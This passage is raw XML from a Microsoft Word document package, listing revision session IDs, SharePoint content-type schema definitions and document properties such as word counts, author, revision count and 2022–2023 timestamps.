    <w:rsid w:val="00943CF9"/>
    <w:rsid w:val="00952F32"/>
    <w:rsid w:val="00961D01"/>
    <w:rsid w:val="0097224F"/>
    <w:rsid w:val="0098280B"/>
    <w:rsid w:val="009A33CD"/>
    <w:rsid w:val="009C002C"/>
    <w:rsid w:val="009F300A"/>
    <w:rsid w:val="009F3A3C"/>
    <w:rsid w:val="00A14F3B"/>
    <w:rsid w:val="00A17DFB"/>
    <w:rsid w:val="00A41FF4"/>
    <w:rsid w:val="00A50A55"/>
    <w:rsid w:val="00A64F95"/>
    <w:rsid w:val="00A70609"/>
    <w:rsid w:val="00A815D6"/>
    <w:rsid w:val="00AC1078"/>
    <w:rsid w:val="00AC1C6A"/>
    <w:rsid w:val="00AE0732"/>
    <w:rsid w:val="00B03754"/>
    <w:rsid w:val="00B31BAF"/>
    <w:rsid w:val="00B53C62"/>
    <w:rsid w:val="00B57D09"/>
    <w:rsid w:val="00B60E1A"/>
    <w:rsid w:val="00B76593"/>
    <w:rsid w:val="00B8751C"/>
    <w:rsid w:val="00B92C7E"/>
    <w:rsid w:val="00B97B1C"/>
    <w:rsid w:val="00BB1AF0"/>
    <w:rsid w:val="00BC4588"/>
    <w:rsid w:val="00BD170B"/>
    <w:rsid w:val="00BF1809"/>
    <w:rsid w:val="00BF622D"/>
    <w:rsid w:val="00BF7635"/>
    <w:rsid w:val="00C17154"/>
    <w:rsid w:val="00C84AF3"/>
    <w:rsid w:val="00C93836"/>
    <w:rsid w:val="00CB03F9"/>
    <w:rsid w:val="00CB08BE"/>
    <w:rsid w:val="00CB451E"/>
    <w:rsid w:val="00CD715F"/>
    <w:rsid w:val="00D239C1"/>
    <w:rsid w:val="00D27BF0"/>
    <w:rsid w:val="00D3533E"/>
    <w:rsid w:val="00D432D1"/>
    <w:rsid w:val="00D46F29"/>
    <w:rsid w:val="00D51B4A"/>
    <w:rsid w:val="00D52E88"/>
    <w:rsid w:val="00D54F09"/>
    <w:rsid w:val="00D6371F"/>
    <w:rsid w:val="00D84809"/>
    <w:rsid w:val="00D87F16"/>
    <w:rsid w:val="00DA25BD"/>
    <w:rsid w:val="00DA5C95"/>
    <w:rsid w:val="00DC0B66"/>
    <w:rsid w:val="00DC2E95"/>
    <w:rsid w:val="00E03D3F"/>
    <w:rsid w:val="00E1118D"/>
    <w:rsid w:val="00E54DE8"/>
    <w:rsid w:val="00E6170A"/>
    <w:rsid w:val="00E642BD"/>
    <w:rsid w:val="00E82D72"/>
    <w:rsid w:val="00EC753E"/>
    <w:rsid w:val="00F22F74"/>
    <w:rsid w:val="00F26B0D"/>
    <w:rsid w:val="00F327CE"/>
    <w:rsid w:val="00F361E6"/>
    <w:rsid w:val="00F37046"/>
    <w:rsid w:val="00F45D1A"/>
    <w:rsid w:val="00F47E89"/>
    <w:rsid w:val="00F558EA"/>
    <w:rsid w:val="00F63887"/>
    <w:rsid w:val="00F668F8"/>
    <w:rsid w:val="00FA03B1"/>
    <w:rsid w:val="00FA5AB2"/>
    <w:rsid w:val="00FA5EA1"/>
    <w:rsid w:val="00FC76B9"/>
    <w:rsid w:val="00FE1E53"/>
    <w:rsid w:val="00F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D028BC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C0C605BB-3ED6-0346-8BC9-D78B1A56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29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429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2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42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44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81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473001E400FB41A8651FF06388E48B" ma:contentTypeVersion="3" ma:contentTypeDescription="Crée un document." ma:contentTypeScope="" ma:versionID="be35d82457042233532265d36802f562">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="21a0dda6-a354-4c5d-9a66-03fd9702a93e" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1de6def1b7007ac58951f2003fbd7eac" ns2:_="">
    <xsd:import namespace="21a0dda6-a354-4c5d-9a66-03fd9702a9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0dda6-a354-4c5d-9a66-03fd9702a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80FE94-55B8-47BC-AD9B-9D6F813C9F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3A28CC-3B11-4014-B808-CC92F0CB2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a0dda6-a354-4c5d-9a66-03fd9702a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AB8DB2-A568-42F2-BACA-69103D70B9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2402</Words>
  <Characters>13211</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>110</Lines>
  <Paragraphs>31</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15582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STREBELLE</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sébastien STREBELLE</cp:lastModifiedBy>
  <cp:revision>148</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-11-10T07:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-02T16:07:00Z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0x0101000C473001E400FB41A8651FF06388E48B</vt:lpwstr>
  </property>
</Properties>
</file>